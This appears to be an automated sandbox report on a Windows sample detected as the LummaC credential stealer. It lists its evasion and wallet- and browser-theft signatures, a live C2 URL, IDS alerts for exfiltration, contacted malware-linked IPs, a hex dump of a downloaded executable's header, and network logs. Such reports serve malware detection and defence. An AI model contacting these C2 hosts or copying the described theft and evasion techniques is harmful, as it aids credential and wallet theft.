Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565521
MD5: a9a9f7a7b9ed25c8df3e4676a11593f3
SHA1: 54934b66d0290fdc3b89b07de78a7e7461445416
SHA256: 5ead7defc7e896fcb9e0b8c17f978c0eb2c063ce3364925ef0df6880fb3c7921
Tags: exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Found malware configuration
Source: file.exe.4344.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": "https://atten-supporse.biz/api", "Build Version": "LOGS11--LiveTraffi"}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP Parser: No favicon
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.6:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.6:49812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49902 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49950 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49961 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50029 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50035 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.2416083737.0000000007C90000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2513647374.0000000005BC2000.00000040.00000800.00020000.00000000.sdmp

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49709 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49715 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49707 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49707 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:49722 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49742 -> 104.21.16.9:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://atten-supporse.biz/api
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:12:25 GMTContent-Type: application/octet-streamContent-Length: 2765824Last-Modified: Sat, 30 Nov 2024 03:03:30 GMTConnection: keep-aliveETag: "674a8082-2a3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 b9 3a 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 62 6d 66 7a 76 68 62 00 e0 29 00 00 a0 00 00 00 d2 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 74 67 67 72 6c 70 7a 00 20 00 00 00 80 2a 00 00 06 00 00 00 0c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 12 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 13.107.246.63 13.107.246.63
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49715 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49707 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49722 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49745 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49742 -> 104.21.16.9:443
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.181.5
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.181.5
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.181.5
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.181.5
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.181.5
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.181.5
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.181.5
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=5VeGEGoNDS2WapR&MD=4dYcZxFY HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
